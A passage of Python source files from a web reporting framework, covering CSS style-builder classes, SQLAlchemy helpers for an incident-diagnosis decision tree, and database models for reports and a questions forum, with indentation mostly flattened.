cssIdParts.append("%s ~ " % self.preceedTag)
# Special case when the style is very specific to one item in the page
if htmlId is not None:
cssIdParts.append("#%s" % htmlId)
else:
# Default behaviour as the framework will directly attach html classes
# to CSS styles defined in this python framework
if htmlTag is not None:
if htmlTag.startswith(":"):
cssIdParts.append(".%s%s" % (self.classname, htmlTag))
else:
cssIdParts.append("%s.%s" % (htmlTag, self.classname))
else:
cssIdParts.append(".%s" % self.classname)
# Extra feature if a HTML tag type is defined
# for example all the html objects with a name defined as youpi [name=youpi]
if htmlType is not None:
cssIdParts.append("[%s=%s]" % (htmlType[0], htmlType[1]))
self.cssId = ''.join(cssIdParts)
return self.cssId
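  # Examples of generated selectors (sketch, for a class named CssExample):
  #   setId()                      -> ".py_cssexample"
  #   setId(htmlTag="td")          -> "td.py_cssexample"
  #   setId(htmlId="report_table") -> "#report_table"
  #   with parentTag = "tr"        -> "tr > td.py_cssexample"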
def add(self, attr, value):
"""
:category: CSS Style Builder
:rubric: PY
:example: add('color', 'blue')
:dsc:
Add a Style to the CSS object
"""
self.style.append({'attr': attr, 'value': value})
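  # NOTE: the update(cssObj) method below is shadowed by the later update(name, value)
  # definition in this class; Python only keeps the last definition of a method name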
def update(self, cssObj):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Override the CSS style attributes with the new CSS object
"""
self.style.update(cssObj.style)
def cssData(self, paramsCss):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Convert a Python CSS Class to a well defined CSS Class
:return: Returns the Python dictionary in a CSS format
"""
# Function to override some parameters
self.customize(self.style, self.eventsStyles)
return "{%s}" % "; ".join(["%(attr)s:%(value)s" % css for css in paramsCss])
def getStyles(self, cssId=True):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Function to process the Static CSS Python configuration and to convert it to String fragments following the CSS Web standard.
:return: A Python dictionary with all the different styles and selector to be written to the page for a given Python CSS Class
"""
res = {}
if self.childrenTag is not None:
res["%s %s" % (self.cssId, self.childrenTag)] = self.cssData(self.style)
for key, val in self.__states().items():
skey = "::" if "::" in key else ":"
splitKey = key.split(skey)
res["%s %s%s%s" % (splitKey[0], self.childrenTag, skey, splitKey[1])] = val
elif self.directChildrenTag is not None:
res["%s > %s" % (self.cssId, self.directChildrenTag)] = self.cssData(self.style)
for key, val in self.__states().items():
skey = "::" if "::" in key else ":"
splitKey = key.split(skey)
res["%s > %s%s%s" % (splitKey[0], self.directChildrenTag, skey, splitKey[1])] = val
else:
res[self.cssId] = self.cssData(self.style)
res.update(self.__states())
return res
def getStyleId(self, htmlRef):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name
    :return: Returns the CSS part to be written in the page for a given HTML id
"""
htmlId = "#%s" % htmlRef
cssData = str(self)
if htmlId in self.cssObj.cssStyles:
if self.cssObj.cssStyles[htmlId] != cssData:
raise Exception("CSS style conflict for %s" % htmlRef)
self.cssObj.cssStyles[htmlId] = cssData
def getStyleTag(self, htmlTag):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name
    :return: Returns the CSS part to be written in the page by HTML tag
"""
self.cssObj.cssStyles[htmlTag] = self.cssData(self.style)
def getStyleCls(self, clss, htmlType=None):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name with the right class selector
return: Returns the CSS part to be written in the page by class name
:link W3C Documentation: https://www.w3schools.com/cssref/sel_class.asp
"""
if htmlType is not None:
self.cssObj.cssStyles["%s.%s" % (htmlType, clss)] = self.cssData(self.style)
else:
self.cssObj.cssStyles[".%s" % clss] = self.cssData(self.style)
def getStyleName(self, htmlType, name):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Add the CSS Fragment for a very bespoke CSS configuration based on HTML item names.
    This can be used when only some components with the tag (or not) are impacted by a CSS Style
:return: Returns the CSS part to be written in the page by class name
"""
self.cssObj.cssStyles["%s[name='%s']" % (htmlType, name)] = self.cssData(self.style)
def update(self, name, value):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Update or extend the CSS attribute of a python CSS class.
Please make sure that the properties you want to override are not part of the object signature.
The object parameters are the last overrides, so they will remove your changes
"""
for attrDate in self.style:
if attrDate['attr'] == name:
attrDate['value'] = value
break
else: # Append a new property
self.style.append( {"attr": name, 'value': value})
def __str__(self):
"""
:category: CSS
:rubric: JS
:dsc:
    Return the CSS dictionary which could be used by the Jquery module directly.
:return: A Javascript dictionary as a string python object
"""
return "{%s}" % ", ".join([ "%s: %s" % (s['attr'], json.dumps(s['value'])) for s in self.style])
def to_dict(self):
"""
:category: CSS
:rubric: PY
:dsc:
Return the Python dictionary with the CSS attributes
:return: The Style dictionary
"""
return dict([(s['attr'], s['value']) for s in self.style])
```
#### File: Lib/css/CssDrop.py
```python
import CssBase
class CssDropFile(CssBase.CssCls):
__style = [
{'attr': 'text-align', 'value': 'center'},
{'attr': 'padding', 'value': '5px'},
{'attr': 'margin', 'value': '5px 0 10px 0'}
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'border': '1px dashed %s' % self.colorCharts['blueColor'][11], 'color': self.colorCharts['blueColor'][11]})
```
#### File: Lib/css/CssIcon.py
```python
import CssBase
class CssStdIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 20px'},
{'attr': 'font-size', 'value': '20px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['blueColor'][6]} )
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIconRigth(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'float', 'value': 'right'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIconRed(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1]} )
eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
class CssOutIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 20px'},
{'attr': 'font-size', 'value': '15px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1]} )
eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
class CssBigIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 10px 0 10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1], 'font-size': self.fontSize} )
eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
```
#### File: Lib/css/CssRadio.py
```python
import CssBase
class CssRadioButton(CssBase.CssCls):
__style = [
{'attr': 'padding', 'value': '5px'},
{'attr': 'cursor', 'value': 'pointer'},
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['greyColor'][0], 'color': self.colorCharts['greyColor'][8], 'font-size': CssBase.CssCls.fontSize})
class CssRadioButtonSelected(CssBase.CssCls):
__style = [
{'attr': 'padding', 'value': '5px'},
{'attr': 'cursor', 'value': 'pointer'},
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['blueColor'][2], 'color': self.colorCharts['greyColor'][0], 'font-size': CssBase.CssCls.fontSize})
class CssRadioSwitch(CssBase.CssCls):
""" CSS Style for the excel tables """
__style = [{'attr': 'height', 'value': '0'},
{'attr': 'width', 'value': '0'},
{'attr': 'visibility', 'value': 'hidden'}]
childrenTag = 'input'
class CssRadioSwitchLabel(CssBase.CssCls):
""" CSS Style for the excel tables """
__style = [{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'margin', 'value': '2px'},
{'attr': 'text-indent', 'value': '-9999px'},
{'attr': 'display', 'value': 'block'},
{'attr': 'border-radius', 'value': '100px'},
{'attr': 'position', 'value': 'relative'},
]
after = [{'attr': 'content', 'value': "''"},
{'attr': 'position', 'value': 'absolute'},
{'attr': 'left', 'value': '5px'},
{'attr': 'width', 'value': '20px'},
{'attr': 'height', 'value': '100%'},
{'attr': 'border-radius', 'value': '20px'},
{'attr': 'transition', 'value': '0.3s'},
]
childrenTag = 'label'
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['greyColor'][1]})
eventsStyles['after'].update({'background-color': self.colorCharts['greyColor'][0]})
class CssRadioSwitchChecked(CssBase.CssCls):
""" """
__style = []
after = [
{'attr': 'left', 'value': 'calc(100% - 5px)'},
{'attr': 'transform', 'value': 'translateX(-100%)'}
]
childrenTag = "input:checked + label"
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['baseColor'][7]})
```
#### File: Lib/css/CssTable.py
```python
import CssBase
class CssTableBasic(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'border-collapse', 'value': 'collapse'},
]
class CssTableColumnSystem(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'font-weight', 'value': 'bold'},
]
class CssTableColumnFixed(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'font-weight', 'value': 'bold'},
]
class CssTableNewRow(CssBase.CssCls):
__style = [
{'attr': 'color', 'value': '#546472'},
]
class CssTableSelected(CssBase.CssCls):
__style = [
{'attr': 'background-color', 'value': '#AEDAF8!important'},
]
class CssCellComment(CssBase.CssCls):
__style = [
{'attr': 'margin', 'value': '0!important'},
{'attr': 'padding', 'value': '2px 0 0 2px!important'},
]
class CssCellSave(CssBase.CssCls):
__style = [
{'attr': 'color', 'value': '#293846!important'},
]
class CssTdEditor(CssBase.CssCls):
__style = [
{'attr': 'border-width', 'value': '1px'},
{'attr': 'border-style', 'value': 'solid'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'height', 'value': '30px'},
{'attr': 'padding', 'value': '5px'},
{'attr': 'vertical-align', 'value': 'middle'},
]
def customize(self, style, eventsStyles):
style.update({"color": self.colorCharts['blueColor'][6], 'border-color': self.colorCharts['greyColor'][9]})
class CssTdDetails(CssBase.CssCls):
__style = []
before = [
{'attr': "content", "value": r"'\f0fe'"},
{'attr': "font-family", "value": "'Font Awesome 5 Free'"},
{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'padding', 'value': '0 5px 0 0'}
]
htmlTag = 'td'
class CssTdDetailsShown(CssBase.CssCls):
"""
  :category: Table
  :rubric: CSS
  :type: Configuration
  :dsc:
  CSS Style for a table cell once its details row has been expanded (switches the Font Awesome icon)
"""
__style = []
before = [
{'attr': "content", "value": r"'\f146'"},
{'attr': "font-family", "value": "'Font Awesome 5 Free'"},
{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'padding', 'value': '0 5px 0 0'}
]
htmlTag = 'td'
```
#### File: db/sql/AresSqlIncidents.py
```python
import json
import inspect
import datetime
from sqlalchemy.sql import func
from ares.Lib.db import SqlTablesIncidents
def addQuestion(name, dsc, level, system, userName, hostname):
"""
:dsc:
Add a question to the defined system table. The default one here is the base table but this can be system specific.
In this case the class should be find dyna,ically from the SqlAlchemy models
"""
response = SqlTablesIncidents.IncQuestionsBase.query.filter_by(name=name).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncQuestionsBase(name, dsc, level, userName, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "qId": runScriptResp.q_id, "dsc": "Question correctly added to %s" % system}
return {"status": False, "qId": response.q_id, "dsc": "Question already defined for this system %s" % system}
def getQuestions(expr=None, numRecords=30):
"""
:dsc:
Returns the list of questions by creation date
"""
records = {}
baseQuery = SqlTablesIncidents.IncQuestionsBase.query.order_by(SqlTablesIncidents.IncQuestionsBase.lst_mod_dt.desc())
if expr is not None:
baseQuery = baseQuery.filter(SqlTablesIncidents.IncQuestionsBase.name.ilike(expr))
for rec in baseQuery.limit(numRecords).all():
records[rec.name] = rec.q_id
return {"status": True, "records": records}
def addGroup(q_id, usr_name, hostname, system):
"""
:dsc:
  Assumption here is that a question can only belong to one group of answers.
  Indeed in this tree:
  1) a question has multiple answers (one group of answers) and each answer points to one question
  2) a group of answers can be linked to multiple questions
"""
response = SqlTablesIncidents.IncQAGroupBase.query.filter_by(q_id=q_id).first()
if response is None:
maxGrpId = SqlTablesIncidents.db.session.query(func.max(SqlTablesIncidents.IncQAGroupBase.a_grp_id)).one()[0]
if maxGrpId is None:
maxGrpId = -1
maxGrpId += 1
runScriptResp = SqlTablesIncidents.IncQAGroupBase(q_id, maxGrpId, usr_name, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Group correctly added to %s" % system, 'gId': maxGrpId}
return {"status": False, "dsc": "Group already available for this system %s" % system, 'gId': response.a_grp_id}
def addAnswer(gId, answer, team, targetQ, userName, hostname, system):
"""
:dsc:
  Add an answer to the given question. It is not yet possible to define a question link or a priority from the UI.
  This information should be added manually directly in the database.
"""
response = SqlTablesIncidents.IncAnswersBase.query.filter_by(a_grp_id=gId, value=answer).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncAnswersBase(answer, gId, 0, team, targetQ, 1, "auto", userName, system, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Answer correctly added to %s and question" % system}
return {"status": False, "dsc": "Answer already available for this system %s and question" % system}
def addAdvice(gId, advice, userName, hostname):
"""
:dsc:
  Advice table. This can be fully updated from the UI. Any user can update this table and add relevant information.
  If the advice helps on the incident resolution, the user can mention it and it will be reflected in the KPIs
"""
response = SqlTablesIncidents.IncAdvicesBase.query.filter_by(q_id=gId).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncAdvicesBase(gId, advice, userName, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
else:
response.text = advice
response.usr_name = userName
response.hostname = hostname
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Advice correctly added"}
def addIncident(pry, attrs, usr_name, hostname):
"""
:dsc:
  Add a new incident to the framework. This entry is used to keep track of the status changes during the decision tree.
  If no resolution is performed the full description is sent to the main system to track the change and ask for a manual intervention
  from the relevant IT and support teams
"""
runScriptResp = SqlTablesIncidents.IncRepo("", "", "", "", pry, "DIAGNOSIS", "[]", usr_name, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
runScriptResp = SqlTablesIncidents.IncScoreDtls(runScriptResp.inc_id, json.dumps(attrs), hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Advice correctly added", 'incId': runScriptResp.inc_id}
def IncidentPry(incId, pry, label, dbase, qId, email):
"""
:dsc:
Update some information in the incident table in order to keep track of the priority and the questions answered in the
decision tree.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
qBreadCrumb = json.loads(response.tree)
qBreadCrumb.append({"table": dbase, 'qId': qId, 'answer': label})
response.lst_mod_dt = datetime.datetime.utcnow()
response.pry += pry
response.team = email
response.last_q_id = qId
response.tree = json.dumps(qBreadCrumb)
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True}
return {"status": False}
def IncidentOvrPry(incId, pry, usr_name, hostname):
"""
"""
response = SqlTablesIncidents.IncPryOvr.query.filter_by(code=incId).first()
if response is None:
response = SqlTablesIncidents.IncPryOvr(incId, pry, usr_name, "", hostname)
SqlTablesIncidents.db.session.add(response)
else:
response.pry = pry
response.usr_name = usr_name
response.hostname = hostname
response.lst_mod_dt = datetime.datetime.utcnow()
SqlTablesIncidents.db.session.commit()
def IncidentStatus(incId, nodeId, cmmt=None, status=None):
"""
:dsc:
  Change some incident information and the status of the incident. This will help with the production of KPIs to assess
  the efficiency of this model. With a good series of questions and advices the framework should assist in the incident
  resolution. Those KPIs will help find recurrent issues and the time spent on some branches of the decision tree.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
response.lst_mod_dt = datetime.datetime.utcnow()
if int(nodeId) != -1:
response.last_q_id = nodeId
if cmmt is not None:
response.cmmt = cmmt
if status is not None:
response.status = status
response.time_spent = response.lst_mod_dt - response.start_dt
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True}
return {"status": False}
def getQuestion(qId):
"""
:dsc:
Retrieve all the question information from the different tables. The question and its answers belong to the same system.
"""
header = ["title", "advice", "answer", "db", "score", "team", "next_id"]
records = {'id': qId, 'answers': {}}
question = SqlTablesIncidents.IncQuestionsBase.query.filter_by(q_id=qId).first()
if question is not None:
records.update({'title': question.name, 'dsc': question.dsc, 'pry': question.lvl, 'details': question.details})
advice = SqlTablesIncidents.IncAdvicesBase.query.filter_by(q_id=qId).first()
if advice is not None:
records['advice'] = advice.text
groups = SqlTablesIncidents.IncQAGroupBase.query.filter_by(q_id=qId).first()
if groups is not None:
records['group_id'] = groups.a_grp_id
for rec in SqlTablesIncidents.db.session.query(
SqlTablesIncidents.IncAnswersBase.value, SqlTablesIncidents.IncAnswersBase.db_suffix, SqlTablesIncidents.IncAnswersBase.pry,
SqlTablesIncidents.IncAnswersBase.q_dst_id, SqlTablesIncidents.IncAnswersBase.team) \
.filter(SqlTablesIncidents.IncAnswersBase.valid == 1) \
.filter(SqlTablesIncidents.IncAnswersBase.a_grp_id == groups.a_grp_id).all():
records['answers'][rec[0]] = "%s|%s|%s|%s" % (rec[1], rec[2], rec[3], rec[4])
else:
records['group_id'] = None
return records
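# Shape of the dict returned by getQuestion (illustrative values):
#   {'id': 3, 'title': 'Is the service reachable?', 'dsc': '...', 'pry': 0, 'details': False,
#    'advice': 'Check the proxy settings first', 'group_id': 1,
#    'answers': {'Yes': 'incidents|0|7|[email protected]'}}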
def getSummary():
"""
:dsc:
  Main query to produce the different KPIs related to this new framework
"""
header, records = ['category', 'question', 'pry', 'count'], []
  # pry is selected below, so it must also be part of the group_by for strict SQL engines
  for rec in SqlTablesIncidents.db.session.query(SqlTablesIncidents.IncRepo.status, SqlTablesIncidents.IncRepo.last_q_id,
                                                 SqlTablesIncidents.IncRepo.pry, func.count(SqlTablesIncidents.IncRepo.status))\
          .group_by(SqlTablesIncidents.IncRepo.status, SqlTablesIncidents.IncRepo.last_q_id, SqlTablesIncidents.IncRepo.pry).all():
row = dict(zip(header, rec))
if row['question'] is None:
row['question'] = ""
records.append(row)
return records
def IncDelete(code):
"""
:dsc:
SQL function to remove an existing incident from the database.
This will also remove the respective override if any
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(code=code).first()
  if response is not None:
SqlTablesIncidents.db.session.delete(response)
SqlTablesIncidents.db.session.commit()
responseOvr = SqlTablesIncidents.IncPryOvr.query.filter_by(code=code).first()
  if responseOvr is not None:
SqlTablesIncidents.db.session.delete(responseOvr)
SqlTablesIncidents.db.session.commit()
def getIncident(incId):
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
return {"pry": response.pry, "tree": json.loads(response.tree), "start_dt": response.start_dt, "team": response.team}
return {}
def IncPryOvr(code, score):
"""
:dsc:
  This SQL method is in charge of applying an override to a wrong incident score.
  This will be done manually, and some elements detailing the override might be added.
  The comment field might help in the future to put AI in place based on the history.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(code=code).first()
if response is not None:
if response.pry == score:
return {'status': False, "dsc": 'No change with the initial computed override'}
responseOvr = SqlTablesIncidents.IncPryOvr.query.filter_by(code=code).first()
if responseOvr is None:
      # NOTE: IncPryOvr expects (code, pry, usr_name, cmmt, hostname); user and host are not
      # available in this scope, so empty placeholders are stored here.
      runScriptResp = SqlTablesIncidents.IncPryOvr(code, score, "", "", "")
      SqlTablesIncidents.db.session.add(runScriptResp)
      SqlTablesIncidents.db.session.commit()
return {"status": True, 'dsc': "Override performed for %s" % code}
return {"status": False, 'dsc': "Incident %s has already an override" % code }
return {"status": False, 'dsc': "Incident code %s not found" % code}
def loadStatics(table, data):
"""
"""
tableCls = None
for name, obj in inspect.getmembers(SqlTablesIncidents):
if inspect.isclass(obj):
      if getattr(obj, '__tablename__', None) == table:  # not every class in the module is a model
tableCls = obj
break
if tableCls is not None:
tableCls.query.delete()
SqlTablesIncidents.db.session.commit()
for name, val in data.items():
newData = tableCls(name, val)
SqlTablesIncidents.db.session.add(newData)
SqlTablesIncidents.db.session.commit()
def getStatics(table):
"""
"""
tableCls = None
for name, obj in inspect.getmembers(SqlTablesIncidents):
if inspect.isclass(obj):
      if getattr(obj, '__tablename__', None) == table:  # not every class in the module is a model
tableCls = obj
break
if tableCls is not None:
return dict([(rec.name, rec.score) for rec in tableCls.query.all()])
return {}
```
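
Taken together, the helpers above cover the whole diagnosis loop. Below is a minimal, hedged sketch of one walk through the decision tree; all ids, labels and scores are illustrative assumptions and a Flask application context is expected to be active:

```python
# One pass through the decision tree using the helper functions above.
inc = addIncident(pry=2, attrs={"urgency": "High"}, usr_name="jdoe", hostname="host01")
q = getQuestion(qId=1)                 # root question of the tree (illustrative id)
label = "Yes"                          # answer picked by the user in the UI
# Answers are pipe-encoded as "db_suffix|pry|q_dst_id|team" (see getQuestion)
db_suffix, score, next_q, team = q['answers'][label].split("|")
IncidentPry(inc['incId'], int(score), label, db_suffix, q['id'], team)
IncidentStatus(inc['incId'], next_q, cmmt="resolved thanks to the advice", status="CLOSED")
```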
#### File: Lib/db/SqlTableDbReports.py
```python
from app import db
import datetime
from ares.utils import AresSiphash
class TableDb(db.Model):
__bind_key__ = 'db_data'
__tablename__ = 'dbs'
db_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
db_name = db.Column(db.Text, unique=True, nullable=False)
report_name = db.Column(db.Text)
usr_nam = db.Column(db.String(120), nullable=False)
hostname = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, db_name, report_name, usr_nam, hostname):
self.db_name, self.report_name, self.usr_nam, self.hostname = db_name, report_name, usr_nam, hostname
```
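
A short, hedged sketch of registering a report database with this model; the import path, session handling and values are illustrative assumptions:

```python
from app import db
from ares.Lib.db.SqlTableDbReports import TableDb  # illustrative import path

rec = TableDb("sales_2020.db", "SalesDashboard", "jdoe", "host01")
db.session.add(rec)
db.session.commit()
```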
#### File: Lib/db/SqlTableQuestions.py
```python
from app import db
import datetime
# -------------------------------------------------------------------------------------------------------------------
# SECTION DEDICATED TO THE QUESTIONS
#
class Questions(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question'
issue_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_title = db.Column(db.String(120), nullable=False, unique=True)
issue_content = db.Column(db.Text, nullable=False)
type = db.Column(db.Text, nullable=False)
status = db.Column(db.String(50), nullable=False)
urgent = db.Column(db.Integer, nullable=False) # 0 = N, 1 = Y
group = db.Column(db.String(120), nullable=False) # Default public
usr_name = db.Column(db.String(120), nullable=False)
interest = db.Column(db.Integer, default=0)
best_answer_id = db.Column(db.Integer, default=-1) #-1
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_title, issue_content, type, status, urgent, group, usr_name, interest, hostname):
self.issue_title, self.issue_content, self.type, self.status = issue_title, issue_content, type, status
self.usr_name, self.hostname, self.interest, self.urgent, self.group = usr_name, hostname, interest, urgent, group
class QuestionsDetail(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_detail'
question_extra_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer, nullable=False)
content = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, content, usr_name, hostname):
self.issue_id, self.content, self.usr_name, self.hostname = issue_id, content, usr_name, hostname
class QuestionsViews(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_views'
view_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, value, usr_name):
self.issue_id, self.value, self.usr_name = issue_id, value, usr_name
class QuestionsAlert(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_alert'
alert_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
status = db.Column(db.Integer, default=1) # 1 = Active
moderator = db.Column(db.String(120), default='') # Should be mentioned when status is 0
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, usr_name):
self.issue_id, self.usr_name = issue_id, usr_name
class QuestionsInterest(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_interest'
interest_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
interest_value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, interest_value, usr_name, hostname):
self.issue_id, self.interest_value, self.usr_name, self.hostname = issue_id, interest_value, usr_name, hostname
class QuestionsTags(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_tags'
question_tag_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
tag_name = db.Column(db.Text)
issue_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, tag_name, usr_name):
self.tag_name, self.issue_id, self.usr_name = tag_name, issue_id, usr_name
class QuestionsFollow(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_follow'
follow_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, usr_name, hostname):
self.issue_id, self.usr_name, self.hostname = issue_id, usr_name, hostname
class QuestionsAnswer(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer'
answer_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer, nullable=False)
answer_content = db.Column(db.Text, nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
status = db.Column(db.String(50), nullable=False) # Best answer, Removed...
group_cod = db.Column(db.String(50), nullable=False)
interest = db.Column(db.Integer, default=0)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, answer_content, usr_name, status, group_cod, interest, hostname):
self.issue_id, self.answer_content, self.usr_name, self.status = issue_id, answer_content, usr_name, status
self.hostname, self.group_cod, self.interest = hostname, group_cod, interest
class QuestionsAnswerInterest(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_anwser_interest'
interest_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer)
value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
